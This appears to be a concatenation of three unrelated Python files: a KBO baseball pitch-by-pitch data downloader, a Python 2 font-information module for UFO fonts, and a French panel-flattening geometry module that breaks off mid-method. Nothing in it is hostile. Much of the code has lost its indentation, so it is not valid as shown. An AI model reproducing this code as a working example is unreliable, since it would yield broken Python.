hp = pd.DataFrame(home_players)
hp = hp.assign(pcode = pd.to_numeric(hp.pcode))
away_lineup_df = pd.merge(away_lineup_df, ap, on='pcode', how='outer')
home_lineup_df = pd.merge(home_lineup_df, hp, on='pcode', how='outer')
        # for starters, reset each player's position to the one held at game start
        # (the pitch-by-pitch data reports positions as of the end of the game)
away_lineup_df = away_lineup_df.assign(name = np.where(away_lineup_df.name_x.isnull(),
away_lineup_df.name_y,
away_lineup_df.name_x))
home_lineup_df = home_lineup_df.assign(name = np.where(home_lineup_df.name_x.isnull(),
home_lineup_df.name_y,
home_lineup_df.name_x))
lineup_df_columns = ['name', 'pcode', 'posName', 'hitType', 'seqno', 'batOrder', 'pos']
away_lineup_df = away_lineup_df[lineup_df_columns]
home_lineup_df = home_lineup_df[lineup_df_columns]
away_lineup_df = away_lineup_df\
.assign(posName = np.where(away_lineup_df.pos != '교',
away_lineup_df.pos\
.apply(lambda x: pos_dict.get(x)),
away_lineup_df.posName))
home_lineup_df = home_lineup_df\
.assign(posName = np.where(home_lineup_df.pos != '교',
home_lineup_df.pos\
.apply(lambda x: pos_dict.get(x)),
home_lineup_df.posName))
away_lineup_df = away_lineup_df.assign(homeaway = 'a', team_name = awayTeamName)
home_lineup_df = home_lineup_df.assign(homeaway = 'h', team_name = homeTeamName)
away_pitcher_df = away_pitcher_df.assign(homeaway = 'a', team_name = awayTeamName)
home_pitcher_df = home_pitcher_df.assign(homeaway = 'h', team_name = homeTeamName)
batting_df = pd.concat([away_lineup_df, home_lineup_df])
pitching_df = pd.concat([away_pitcher_df, home_pitcher_df])
batting_df.pcode = pd.to_numeric(batting_df.pcode)
pitching_df.pcode = pd.to_numeric(pitching_df.pcode)
return pitching_df, batting_df, relay_df
def download_pbp_files(start_date, end_date, playoff=False,
save_path=None, debug_mode=False,
save_source=False):
"""
KBO 피치 바이 피치(PBP) 파일을 다운로드.
Parameters
-----------
start_date, end_date : datetime.date
PBP 파일을 받을 경기 기간의 시작일과 종료일.
start_date <= Game Date of Downloaded Files <= end_date
playoff : bool, default False
True일 경우 플레이오프(포스트시즌) 경기 파일도 받는다.
save_path : pathlib.Path, default None
PBP 파일을 저장할 경로.
값이 없을 경우(None) 현재 경로에 저장.
debug_mode : bool, default False
True일 경우 sys.stdout을 통해 디버그 메시지와 수행 시간이 출력됨.
save_source : bool, default False
True일 경우 parsing 이전의 소스 데이터를 csv 형식으로 저장.
"""
start_time = time.time()
game_ids = get_game_ids(start_date, end_date, playoff)
end_time = time.time()
get_game_id_time = end_time - start_time
enc = 'cp949' if sys.platform == 'win32' else 'utf-8'
now = datetime.datetime.now()
logfile = open('./log.txt', 'a', encoding=enc)
logfile.write('\n\n')
logfile.write('====================================\n')
logfile.write(f"Current Time : {now.isoformat()}\n")
logfile.write('====================================\n')
skipped = 0
broken = 0
done = 0
start_time = time.time()
get_data_time = 0
gid = None
years = list(set([x[:4] for x in game_ids]))
try:
for y in years:
y_path = save_path / y
if not y_path.is_dir():
try:
y_path.mkdir()
except FileExistsError:
                    logfile.write(f'ERROR : path {y_path} exists, but is not a directory\n')
                    logfile.write('\tclean the path and try again\n')
                    print(f'ERROR : path {y_path} exists, but is not a directory')
                    print('\tclean the path and try again')
exit(1)
for gid in tqdm(game_ids):
now = datetime.datetime.now().date()
gid_to_date = datetime.date(int(gid[:4]),
int(gid[4:6]),
int(gid[6:8]))
if gid_to_date > now:
continue
if (save_path / gid[:4] / f'{gid}.csv').exists():
skipped += 1
continue
ptime = time.time()
source_path = save_path / gid[:4] / 'source'
            if (source_path / f'{gid}_pitching.csv').exists() and \
               (source_path / f'{gid}_batting.csv').exists() and \
               (source_path / f'{gid}_relay.csv').exists():
game_data_dfs = []
game_data_dfs.append(pd.read_csv(str(source_path / f'{gid}_pitching.csv'), encoding=enc))
game_data_dfs.append(pd.read_csv(str(source_path / f'{gid}_batting.csv'), encoding=enc))
game_data_dfs.append(pd.read_csv(str(source_path / f'{gid}_relay.csv'), encoding=enc))
else:
game_data_dfs = get_game_data_renewed(gid)
if game_data_dfs[0] is None:
logfile.write(game_data_dfs[-1])
                if debug_mode:
print(game_data_dfs[-1])
exit(1)
            if save_source:
if not source_path.is_dir():
try:
source_path.mkdir()
except FileExistsError:
source_path = save_path / gid[:4]
                        logfile.write(f'NOTE: {gid[:4]}/source exists but is not a directory. ')
                        logfile.write(f'source files will be saved in {gid[:4]} instead.\n')
if not (source_path / f'{gid}_pitching.csv').exists():
game_data_dfs[0].to_csv(str(source_path / f'{gid}_pitching.csv'),
index=False, encoding=enc, errors='replace')
if not (source_path / f'{gid}_batting.csv').exists():
game_data_dfs[1].to_csv(str(source_path / f'{gid}_batting.csv'),
index=False, encoding=enc, errors='replace')
if not (source_path / f'{gid}_relay.csv').exists():
game_data_dfs[2].to_csv(str(source_path / f'{gid}_relay.csv'),
index=False, encoding=enc, errors='replace')
get_data_time += time.time() - ptime
if game_data_dfs is not None:
gs = game_status()
gs.load(gid, game_data_dfs[0], game_data_dfs[1], game_data_dfs[2], log_file=logfile)
parse = gs.parse_game(debug_mode)
gs.save_game(save_path / gid[:4])
                if parse:
done += 1
else:
broken += 1
else:
broken += 1
continue
end_time = time.time()
parse_time = end_time - start_time - get_data_time
logfile.write('====================================\n')
logfile.write(f'Start date : {start_date.strftime("%Y%m%d")}\n')
logfile.write(f'End date : {end_date.strftime("%Y%m%d")}\n')
logfile.write(f'Successfully downloaded games : {done}\n')
logfile.write(f'Skipped games(already exists) : {skipped}\n')
logfile.write(f'Broken games(bad data) : {broken}\n')
logfile.write('====================================\n')
        if debug_mode:
logfile.write(f'Elapsed {get_game_id_time:.2f} sec in get_game_ids\n')
logfile.write(f'Elapsed {(get_data_time):.2f} sec in get_game_data\n')
logfile.write(f'Elapsed {(parse_time):.2f} sec in parse_game\n')
logfile.write(f'Total {(parse_time+get_game_id_time+get_data_time):.2f} sec elapsed with {len(game_ids)} games\n')
if logfile.closed is not True:
logfile.close()
    except Exception:
        logfile.write(f'=== gameID : {gid}\n')
        if logfile.closed is not True:
            logfile.close()
        raise
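# A minimal usage sketch (hypothetical dates and path; kept as comments so the
# module's behavior is unchanged):
# download_pbp_files(datetime.date(2019, 3, 23), datetime.date(2019, 3, 24),
#                    playoff=False, save_path=pathlib.Path('.'),
#                    debug_mode=True, save_source=True)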
|
# [h] hTools2.modules.fontinfo
"""Tools to get and set different kinds of font information.
See the `UFO documentation <http://unifiedfontobject.org/versions/ufo2/fontinfo.html>`_.
"""
# debug
import hTools2
reload(hTools2)
if hTools2.DEBUG:
import fileutils
reload(fileutils)
# imports
import os
from fileutils import get_names_from_path
# set info
def set_font_names(font, family_name, style_name):
"""Set several font naming fields from ``family`` and ``style`` names."""
full_name = '%s_%s' % (family_name, style_name)
# main family/style names
font.info.familyName = family_name
font.info.styleName = style_name
# style map names
font.info.styleMapFamilyName = None # full_name
font.info.styleMapStyleName = None # 'regular'
# opentype names
font.info.openTypeNamePreferredFamilyName = None # family_name
font.info.openTypeNamePreferredSubfamilyName = None # style_name
font.info.openTypeNameCompatibleFullName = None # full_name
font.info.openTypeNameUniqueID = None
# postscript names
font.info.postscriptFontName = None # full_name
font.info.postscriptFullName = None # full_name
font.info.postscriptUniqueID = None
font.info.postscriptWeightName = None
# FOND names
font.info.macintoshFONDFamilyID = None
font.info.macintoshFONDName = None
def set_names_from_path(font, prefix=None):
"""Set the font naming fields using parts of the name of the font file."""
family_name, style_name = get_names_from_path(font.path)
if prefix:
family_name = prefix + ' ' + family_name
set_font_names(font, family_name, style_name)
def set_vmetrics(font, xheight, capheight, ascender, descender, emsquare, gridsize=1):
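    """Set the font's vertical metrics, scaling each value by ``gridsize``."""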
font.info.xHeight = xheight * gridsize
font.info.capHeight = capheight * gridsize
font.info.descender = descender * gridsize
font.info.ascender = ascender * gridsize
font.info.unitsPerEm = emsquare * gridsize
# print info
def print_font_info(font, options=None):
"""Print several kinds of font information, using a special method for each section.
The data and related functions are organized according to the UFO 2 spec.
"""
print 'printing font info...'
print_generic_identification(font)
print_generic_legal(font)
print_generic_dimension(font)
print_generic_miscellaneous(font)
print_opentype_head(font)
print_opentype_hhea(font)
print_opentype_name(font)
print_opentype_os2(font)
print_opentype_vhea(font)
print_postscript_data(font)
def print_generic_identification(font):
print '-' * 60
print 'Generic Identification Information'
print '-' * 60
print 'familyName:', font.info.familyName
print 'styleName:', font.info.styleName
print 'styleMapFamilyName:', font.info.styleMapFamilyName
print 'styleMapStyleName:', font.info.styleMapStyleName
print 'versionMajor:', font.info.versionMajor
print 'versionMinor:', font.info.versionMinor
print 'year:', font.info.year
print
def print_generic_legal(font):
print '-' * 60
print 'Generic Legal Information'
print '-' * 60
print 'copyright: %s' % font.info.copyright
print 'trademark: %s' % font.info.trademark
print
def print_generic_dimension(font):
print '-' * 60
print 'Generic Dimension Information'
print '-' * 60
print 'unitsPerEm: %s' % font.info.unitsPerEm
print 'descender: %s' % font.info.descender
print 'xHeight: %s' % font.info.xHeight
print 'capHeight: %s' % font.info.capHeight
print 'ascender: %s' % font.info.ascender
print 'italicAngle: %s' % font.info.italicAngle
print
def print_generic_miscellaneous(font):
print '-' * 60
print 'Generic Miscellaneous Information'
print '-' * 60
print 'note: %s' % font.info.note
print
def print_opentype_head(font):
print '-' * 60
print 'OpenType head Table Fields'
print '-' * 60
print 'openTypeHeadCreated: %s' % font.info.openTypeHeadCreated
print 'openTypeHeadLowestRecPPEM: %s' % font.info.openTypeHeadLowestRecPPEM
print 'openTypeHeadFlags: %s' % font.info.openTypeHeadFlags
print
def print_opentype_hhea(font):
print '-' * 60
print 'OpenType hhea Table Fields'
print '-' * 60
print 'openTypeHheaAscender: %s' % font.info.openTypeHheaAscender
print 'openTypeHheaDescender: %s' % font.info.openTypeHheaDescender
print 'openTypeHheaLineGap: %s' % font.info.openTypeHheaLineGap
print 'openTypeHheaCaretSlopeRise: %s' % font.info.openTypeHheaCaretSlopeRise
print 'openTypeHheaCaretSlopeRun: %s' % font.info.openTypeHheaCaretSlopeRun
print 'openTypeHheaCaretOffset: %s' % font.info.openTypeHheaCaretOffset
print
def print_opentype_name(font):
print '-' * 60
print 'OpenType Name Table Fields'
print '-' * 60
print 'openTypeNameDesigner: %s' % font.info.openTypeNameDesigner
print 'openTypeNameDesignerURL: %s' % font.info.openTypeNameDesignerURL
print 'openTypeNameManufacturer: %s' % font.info.openTypeNameManufacturer
print 'openTypeNameManufacturerURL: %s' % font.info.openTypeNameManufacturerURL
print 'openTypeNameLicense: %s' % font.info.openTypeNameLicense
print 'openTypeNameLicenseURL: %s' % font.info.openTypeNameLicenseURL
print 'openTypeNameVersion: %s' % font.info.openTypeNameVersion
print 'openTypeNameUniqueID: %s' % font.info.openTypeNameUniqueID
print 'openTypeNameDescription: %s' % font.info.openTypeNameDescription
print 'openTypeNamePreferredFamilyName: %s' % font.info.openTypeNamePreferredFamilyName
print 'openTypeNamePreferredSubfamilyName: %s' % font.info.openTypeNamePreferredSubfamilyName
print 'openTypeNameCompatibleFullName: %s' % font.info.openTypeNameCompatibleFullName
print 'openTypeNameSampleText: %s' % font.info.openTypeNameSampleText
print 'openTypeNameWWSFamilyName: %s' % font.info.openTypeNameWWSFamilyName
print 'openTypeNameWWSSubfamilyName: %s' % font.info.openTypeNameWWSSubfamilyName
print
def print_opentype_os2(font):
print '-' * 60
print 'OpenType OS/2 Table Fields'
print '-' * 60
print 'openTypeOS2WidthClass: %s' % font.info.openTypeOS2WidthClass
print 'openTypeOS2WeightClass: %s' % font.info.openTypeOS2WeightClass
print 'openTypeOS2Selection: %s' % font.info.openTypeOS2Selection
print 'openTypeOS2VendorID: %s' % font.info.openTypeOS2VendorID
print 'openTypeOS2Panose: %s' % font.info.openTypeOS2Panose
print 'openTypeOS2FamilyClass: %s' % font.info.openTypeOS2FamilyClass
print 'openTypeOS2UnicodeRanges: %s' % font.info.openTypeOS2UnicodeRanges
print 'openTypeOS2CodePageRanges: %s' % font.info.openTypeOS2CodePageRanges
print 'openTypeOS2TypoAscender: %s' % font.info.openTypeOS2TypoAscender
print 'openTypeOS2TypoDescender: %s' % font.info.openTypeOS2TypoDescender
print 'openTypeOS2TypoLineGap: %s' % font.info.openTypeOS2TypoLineGap
print 'openTypeOS2WinAscent: %s' % font.info.openTypeOS2WinAscent
print 'openTypeOS2WinDescent: %s' % font.info.openTypeOS2WinDescent
print 'openTypeOS2Type: %s' % font.info.openTypeOS2Type
print 'openTypeOS2SubscriptXSize: %s' % font.info.openTypeOS2SubscriptXSize
print 'openTypeOS2SubscriptYSize: %s' % font.info.openTypeOS2SubscriptYSize
print 'openTypeOS2SubscriptXOffset: %s' % font.info.openTypeOS2SubscriptXOffset
print 'openTypeOS2SubscriptYOffset: %s' % font.info.openTypeOS2SubscriptYOffset
print 'openTypeOS2SuperscriptXSize: %s' % font.info.openTypeOS2SuperscriptXSize
print 'openTypeOS2SuperscriptYSize: %s' % font.info.openTypeOS2SuperscriptYSize
print 'openTypeOS2SuperscriptXOffset: %s' % font.info.openTypeOS2SuperscriptXOffset
print 'openTypeOS2SuperscriptYOffset: %s' % font.info.openTypeOS2SuperscriptYOffset
print 'openTypeOS2StrikeoutSize: %s' % font.info.openTypeOS2StrikeoutSize
print 'openTypeOS2StrikeoutPosition: %s' % font.info.openTypeOS2StrikeoutPosition
print
def print_opentype_vhea(font):
print '-' * 60
print 'OpenType vhea Table Fields'
print '-' * 60
print 'openTypeVheaVertTypoAscender: %s' % font.info.openTypeVheaVertTypoAscender
print 'openTypeVheaVertTypoDescender: %s' % font.info.openTypeVheaVertTypoDescender
print 'openTypeVheaVertTypoLineGap: %s' % font.info.openTypeVheaVertTypoLineGap
print 'openTypeVheaCaretSlopeRise: %s' % font.info.openTypeVheaCaretSlopeRise
print 'openTypeVheaCaretSlopeRun: %s' % font.info.openTypeVheaCaretSlopeRun
print 'openTypeVheaCaretOffset: %s' % font.info.openTypeVheaCaretOffset
print
def print_postscript_data(font):
print '-' * 60
print 'PostScript Specific Data'
print '-' * 60
print 'postscriptFontName: %s' % font.info.postscriptFontName
print 'postscriptFullName: %s' % font.info.postscriptFullName
print 'postscriptSlantAngle: %s' % font.info.postscriptSlantAngle
print 'postscriptUniqueID: %s' % font.info.postscriptUniqueID
print 'postscriptUnderlineThickness: %s' % font.info.postscriptUnderlineThickness
print 'postscriptUnderlinePosition: %s' % font.info.postscriptUnderlinePosition
print 'postscriptIsFixedPitch: %s' % font.info.postscriptIsFixedPitch
print 'postscriptBlueValues: %s' % font.info.postscriptBlueValues
print 'postscriptOtherBlues: %s' % font.info.postscriptOtherBlues
print 'postscriptFamilyBlues: %s' % font.info.postscriptFamilyBlues
print 'postscriptFamilyOtherBlues: %s' % font.info.postscriptFamilyOtherBlues
print 'postscriptStemSnapH: %s' % font.info.postscriptStemSnapH
print 'postscriptStemSnapV: %s' % font.info.postscriptStemSnapV
print 'postscriptBlueFuzz: %s' % font.info.postscriptBlueFuzz
print 'postscriptBlueShift: %s' % font.info.postscriptBlueShift
print 'postscriptBlueScale: %s' % font.info.postscriptBlueScale
print 'postscriptForceBold: %s' % font.info.postscriptForceBold
print 'postscriptDefaultWidthX: %s' % font.info.postscriptDefaultWidthX
print 'postscriptNominalWidthX: %s' % font.info.postscriptNominalWidthX
print 'postscriptWeightName: %s' % font.info.postscriptWeightName
print 'postscriptDefaultCharacter: %s' % font.info.postscriptDefaultCharacter
print 'postscriptWindowsCharacterSet: %s' % font.info.postscriptWindowsCharacterSet
print
# clear info
def clear_font_info(font):
"""Clears all font information fields in the font."""
# print 'deleting font info'
clear_generic_identification(font)
clear_generic_legal(font)
clear_generic_dimension(font)
clear_generic_miscellaneous(font)
clear_opentype_head(font)
clear_opentype_hhea(font)
clear_opentype_name(font)
clear_opentype_os2(font)
clear_opentype_vhea(font)
clear_postscript_data(font)
def clear_generic_identification(font):
# print 'deleting Generic Identification Information'
font.info.familyName = None
font.info.styleName = None
font.info.styleMapFamilyName = None
font.info.styleMapStyleName = None
font.info.versionMajor = None
font.info.versionMinor = None
font.info.year = None
def clear_generic_legal(font):
# print 'deleting Generic Legal Information'
font.info.copyright = None
font.info.trademark = None
def clear_generic_dimension(font):
# print 'deleting Generic Dimension Information'
font.info.unitsPerEm = None
font.info.descender = None
font.info.xHeight = None
font.info.capHeight = None
font.info.ascender = None
font.info.italicAngle = None
def clear_generic_miscellaneous(font):
# print 'deleting Generic Miscellaneous Information'
font.info.note = None
def clear_opentype_head(font):
# print 'deleting OpenType head Table Fields'
font.info.openTypeHeadCreated = None
font.info.openTypeHeadLowestRecPPEM = None
font.info.openTypeHeadFlags = None
def clear_opentype_hhea(font):
# print 'deleting OpenType hhea Table Fields'
font.info.openTypeHheaAscender = None
font.info.openTypeHheaDescender = None
font.info.openTypeHheaLineGap = None
font.info.openTypeHheaCaretSlopeRise = None
font.info.openTypeHheaCaretSlopeRun = None
font.info.openTypeHheaCaretOffset = None
def clear_opentype_name(font):
# print 'deleting OpenType Name Table Fields'
font.info.openTypeNameDesigner = None
font.info.openTypeNameDesignerURL = None
font.info.openTypeNameManufacturer = None
font.info.openTypeNameManufacturerURL = None
font.info.openTypeNameLicense = None
font.info.openTypeNameLicenseURL = None
font.info.openTypeNameVersion = None
font.info.openTypeNameUniqueID = None
font.info.openTypeNameDescription = None
font.info.openTypeNamePreferredFamilyName = None
font.info.openTypeNamePreferredSubfamilyName = None
font.info.openTypeNameCompatibleFullName = None
font.info.openTypeNameSampleText = None
font.info.openTypeNameWWSFamilyName = None
font.info.openTypeNameWWSSubfamilyName = None
def clear_opentype_os2(font):
# print 'deleting OpenType OS/2 Table Fields'
font.info.openTypeOS2WidthClass = None
font.info.openTypeOS2WeightClass = None
font.info.openTypeOS2Selection = None
font.info.openTypeOS2VendorID = None
font.info.openTypeOS2Panose = None
font.info.openTypeOS2FamilyClass = None
font.info.openTypeOS2UnicodeRanges = None
font.info.openTypeOS2CodePageRanges = None
font.info.openTypeOS2TypoAscender = None
font.info.openTypeOS2TypoDescender = None
font.info.openTypeOS2TypoLineGap = None
font.info.openTypeOS2WinAscent = None
font.info.openTypeOS2WinDescent = None
font.info.openTypeOS2Type = None
font.info.openTypeOS2SubscriptXSize = None
font.info.openTypeOS2SubscriptYSize = None
font.info.openTypeOS2SubscriptXOffset = None
font.info.openTypeOS2SubscriptYOffset = None
font.info.openTypeOS2SuperscriptXSize = None
font.info.openTypeOS2SuperscriptYSize = None
font.info.openTypeOS2SuperscriptXOffset = None
font.info.openTypeOS2SuperscriptYOffset = None
font.info.openTypeOS2StrikeoutSize = None
font.info.openTypeOS2StrikeoutPosition = None
def clear_opentype_vhea(font):
# print 'deleting OpenType vhea Table Fields'
font.info.openTypeVheaVertTypoAscender = None
font.info.openTypeVheaVertTypoDescender = None
font.info.openTypeVheaVertTypoLineGap = None
font.info.openTypeVheaCaretSlopeRise = None
font.info.openTypeVheaCaretSlopeRun = None
font.info.openTypeVheaCaretOffset = None
def clear_postscript_data(font):
# print 'deleting PostScript Specific Data'
font.info.postscriptFontName = None
font.info.postscriptFullName = None
font.info.postscriptSlantAngle = None
font.info.postscriptUniqueID = None
font.info.postscriptUnderlineThickness = None
font.info.postscriptUnderlinePosition = None
font.info.postscriptIsFixedPitch = None
font.info.postscriptBlueValues = None
font.info.postscriptOtherBlues = None
font.info.postscriptFamilyBlues = None
font.info.postscriptFamilyOtherBlues = None
font.info.postscriptStemSnapH = None
font.info.postscriptStemSnapV = None
font.info.postscriptBlueFuzz = None
font.info.postscriptBlueShift = None
font.info.postscriptBlueScale = None
font.info.postscriptForceBold = None
font.info.postscriptDefaultWidthX = None
font.info.postscriptNominalWidthX = None
font.info.postscriptWeightName = None
font.info.postscriptDefaultCharacter = None
font.info.postscriptWindowsCharacterSet = None
|
#! /bin/env python3
# -*- coding: utf-8 -*-
################################################################################
#
# This file is part of PYJUNK.
#
# Copyright © 2021 Marc JOURDAIN
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the “Software”),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# You should have received a copy of the MIT License
# along with PYJUNK. If not, see <https://mit-license.org/>.
#
################################################################################
"""
Developp.py rassemble la définition des classes:
Developp2D
Developp(Developp2D)
"""
from __future__ import annotations
import sys
import pathlib
import math
from datetime import datetime
import Direction as di
#----- exit status constants
NORMAL_TERMINATION = 0
ABNORMAL_TERMINATION = 1
#----- lookup table (dictionary) for the plot colors
couleur = {
"blanc": 0,
"rouge": 1,
"jaune": 2,
"vert": 3,
"magenta": 4,
"bleu": 5,
"violet": 6,
"gris": 8
}
#----- Class representing the model used to compute the flattened (developed) panel
class Developp2D:
"""
Classe Developp2D
=================
La classe Developp2D calcule et stocke la représentation du développé, 2D par définition
:datas:
self.dictDevelopp2D: dict
self.numPanneau: int
self.lendroit2DMil: list
self.lendroit2DHaut: list
self.lendroit2DBas: list
self.lendroit2DHautChainette: list
self.lendroit2DBasChainette: list
self.lendroit2DHautCouture: list
self.endroit2DMil: Endroit2D
self.endroit2DHaut: Endroit2D
self.endroit2DBas: Endroit2D
:Example:
>>> a = Developp2D({"numPanneau": 0})
>>> print(a)
--> Developp2D :
<BLANKLINE>
.. seealso::
.. warning::
.. note::
.. todo::
"""
#-----
def __init__(self, dictDevelopp2D: dict) -> None:
self.dictDevelopp2D = dictDevelopp2D
if "numPanneau" in self.dictDevelopp2D and isinstance(self.dictDevelopp2D["numPanneau"], int):
self.numPanneau = self.dictDevelopp2D["numPanneau"]
else:
            print('< !!!! > invalid dictionary for dictDevelopp2D')
            print('program aborted')
sys.exit(ABNORMAL_TERMINATION)
        # the lists of 2D points that will be placed in the dxf
self.lendroit2DMil = []
self.lendroit2DHaut = []
self.lendroit2DBas = []
self.lendroit2DHautChainette = []
self.lendroit2DBasChainette = []
self.lendroit2DHautCouture = []
        # the previous 2D points
self.endroit2DMil = None
self.endroit2DHaut = None
self.endroit2DBas = None
#-----
@staticmethod
def calc(dictCalc: dict) -> tuple:
"""
soit 2 cercles (x-a)²+(y-b)²=r0² et (x-c)²+(y-d)²=r1², on cherche les points d'intersection
la Distance entre les centres est D = sqrt[(c-a)²+(d-b)²]
la condition pour qu'il y ait une intersection :
D < r0+r1 et D > abs(r0-r1)
les solutions sont données par :
avec δ = 1/4*sqrt((D+r0+r1)(D+r0-r1)(D-r0+r1)(-D+r0+r1))
x1,2 = (a+c)/2 + (c-a)(r0²-r1²)/(2D²) +- 2δ(b-d)/D²
y1,2 = (b+d)/2 + (d-b)(r0²-r1²)/(2D²) -+ 2δ(a-c)/D²
"""
a = dictCalc["c0"]["x"]
b = dictCalc["c0"]["y"]
c = dictCalc["c1"]["x"]
d = dictCalc["c1"]["y"]
r0 = dictCalc["r0"]
r1 = dictCalc["r1"]
dD = math.hypot((c-a), (d-b))
if not (dD < (r0+r1) and dD > math.fabs(r0-r1)):
            print('no solution found')
            print(f'a -> {a} b -> {b} c -> {c} d -> {d} r0 -> {r0} r1 -> {r1}')
            print(' --> Aborting program')
sys.exit(ABNORMAL_TERMINATION)
part1X = (a+c)/2.
part1Y = (b+d)/2.
part2 = (r0*r0-r1*r1)/(2.*dD*dD)
part2X = (c-a)*part2
part2Y = (d-b)*part2
delta = math.sqrt((dD+r0+r1)*(dD+r0-r1)*(dD-r0+r1)*(-dD+r0+r1))/(2.*dD*dD)
deltaX = (b-d)*delta
deltaY = (a-c)*delta
x = part1X + part2X
x1 = x + deltaX
x2 = x - deltaX
if x1 > x2:
return (x1, part1Y + part2Y - deltaY)
return (x2, part1Y + part2Y + deltaY)
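    # A quick sanity check for calc (hand-picked values, comments only):
    # circles centered at (0, 0) and (6, 0), both of radius 5, intersect at
    # (3, 4) and (3, -4); here x1 == x2, so the second branch is taken:
    #   Developp2D.calc({"c0": {"x": 0., "y": 0.}, "c1": {"x": 6., "y": 0.},
    #                    "r0": 5., "r1": 5.})   # ~ (3.0, -4.0)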
#-----
@staticmethod
def couture(dictCouture: dict) -> tuple:
"""
Calcul de la couture sur le bord haut du développé
Principe : à partir de 2 points successifs de la chainette donc une droite,
on calcule 2 autres points décalés de fCouture et faisant un angle intérieur de angleR
avec la droite
"""
if "fCouture" in dictCouture and isinstance(dictCouture["fCouture"], float):
fCouture = dictCouture["fCouture"]
else:
            print('< !!!! > invalid dictionary for dictCouture')
            print('program aborted')
sys.exit(ABNORMAL_TERMINATION)
angleR = math.radians(60.) # don't try 90°
if "endroitDeb" in dictCouture and isinstance(dictCouture["endroitDeb"], di.Endroit2D):
endroitDeb = dictCouture["endroitDeb"]
else:
            print('< !!!! > invalid dictionary for dictCouture')
            print('program aborted')
sys.exit(ABNORMAL_TERMINATION)
if "endroitFin" in dictCouture and isinstance(dictCouture["endroitFin"], di.Endroit2D):
endroitFin = dictCouture["endroitFin"]
else:
            print('< !!!! > invalid dictionary for dictCouture')
            print('program aborted')
sys.exit(ABNORMAL_TERMINATION)
angleChainette = di.Direction2D(endroitFin - endroitDeb).angle2D()
direction2DDeb = di.Direction2D({"vect2D": {"x": fCouture / math.tan(angleR) , "y": fCouture}})
endroit2DCoutureDeb = endroitDeb + di.Direction2D(direction2DDeb.rot2d(angleChainette))
angleChainette = di.Direction2D(endroitDeb - endroitFin).angle2D()
direction2DFin = di.Direction2D({"vect2D": {"x": fCouture / math.tan(angleR) , "y": -fCouture}})
endroit2DCoutureFin = endroitFin + di.Direction2D(direction2DFin.rot2d(angleChainette))
return (endroit2DCoutureDeb["point2D"]["x"], endroit2DCoutureDeb["point2D"]["y"], \
endroit2DCoutureFin["point2D"]["x"], endroit2DCoutureFin["point2D"]["y"] \
)
#-----
def comp(self, dictDevelopp2D: dict) -> None:
"""
Dans l'espace 2D le calcul a
"""
if dictDevelopp2D["index"] == 0:
endroit2DMil = di.Endroit2D({"point2D": {"x": 0., "y": 0.}})
self.lendroit2DMil.append(endroit2DMil)
fdist3DMilHaut = dictDevelopp2D["fdist3DMilHaut"]
endroit2DHaut = di.Endroit2D({"point2D": {"x": 0., "y": fdist3DMilHaut}})
self.lendroit2DHaut.append(endroit2DHaut)
fdist3DMilBas = dictDevelopp2D["fdist3DMilBas"]
endroit2DBas = di.Endroit2D({"point2D": {"x": 0., "y": -fdist3DMilBas}})
self.lendroit2DBas.append(endroit2DBas)
fdist3DMilHautChainette = dictDevelopp2D["fdist3DMilHautChainette"]
endroit2DHautChainette = di.Endroit2D({"point2D": {"x": 0., "y": fdist3DMilHautChainette}})
self.lendroit2DHautChainette.append(endroit2DHautChainette)
fdist3DMilBasChainette = dictDevelopp2D["fdist3DMilBasChainette"]
endroit2DBasChainette = di.Endroit2D({"point2D": {"x": 0., "y": -fdist3DMilBasChainette}})
self.lendroit2DBasChainette.append(endroit2DBasChainette)
self.lendroit2DHautCouture.append(endroit2DHautChainette)
else:
dictCalc = {}
dictCalc['c0'] = self.endroit2DMil.p2ddict.getDict()
dictCalc["r0"] = dictDevelopp2D["fdist3DMilMil"]
dictCalc['c1'] = self.endroit2DHaut.p2ddict.getDict()
dictCalc["r1"] = dictDevelopp2D["fdist3DHautMil"]
(x, y) = Developp2D.calc(dictCalc=dictCalc)
endroit2DMil = di.Endroit2D({"point2D": {"x": x, "y": y}})
self.lendroit2DMil.append(endroit2DMil)
dictCalc['c0'] = self.endroit2DMil.p2ddict.getDict()
dictCalc["r0"] = dictDevelopp2D["fdist3DMilHaut"]
dictCalc['c1'] = self.endroit2DHaut.p2ddict.getDict()
dictCalc["r1"] = dictDevelopp2D["fdist3DHautHaut"]
(x, y) = Developp2D.calc(dictCalc=dictCalc)
endroit2DHaut = di.Endroit2D({"point2D": {"x": x, "y": y}})
self.lendroit2DHaut.append(endroit2DHaut)
dictCalc['c0'] = self.endroit2DMil.p2ddict.getDict()
dictCalc["r0"] = dictDevelopp2D["fdist3DMilBas"]
dictCalc['c1'] = self.endroit2DBas.p2ddict.getDict()
dictCalc["r1"] = dictDevelopp2D["fdist3DBasBas"]
(x, y) = Developp2D.calc(dictCalc=dictCalc)
endroit2DBas = di.Endroit2D({"point2D": {"x": x, "y": y}})
self.lendroit2DBas.append(endroit2DBas)
dictCalc['c0'] = self.endroit2DMil.p2ddict.getDict()
dictCalc["r0"] = dictDevelopp2D["fdist3DMilHautChainette"]
dictCalc['c1'] = self.endroit2DHaut.p2ddict.getDict()
dictCalc["r1"] = dictDevelopp2D["fdist3DHautHautChainette"]
(x, y) = Developp2D.calc(dictCalc=dictCalc)
endroit2DHautChainette = di.Endroit2D({"point2D": {"x": x, "y": y}})
self.lendroit2DHautChainette.append(endroit2DHautChainette)
dictCalc['c0'] = self.endroit2DMil.p2ddict.getDict()
dictCalc["r0"] = dictDevelopp2D["fdist3DMilBasChainette"]
dictCalc['c1'] = self.endroit2DBas.p2ddict.getDict()
dictCalc["r1"] = dictDevelopp2D["fdist3DBasBasChainette"]
(x, y) = Developp2D.calc(dictCalc=dictCalc)
